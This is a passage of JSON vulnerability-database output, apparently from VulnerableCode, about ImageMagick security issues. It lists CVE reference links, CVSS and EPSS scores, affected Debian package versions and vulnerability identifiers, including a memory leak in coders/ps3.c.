"scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732292", "reference_id": "1732292", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732292" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931190", "reference_id": "931190", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931190" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-12978" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zdu5-rtg2-pffb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82058?format=api", "vulnerability_id": "VCID-zh44-pz7k-abba", "summary": "ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps3.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16712.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16712.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26056", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25865", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25975", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25957", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25927", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26137", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26178", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25948", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26015", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26067", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26077", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26031", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25972", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": 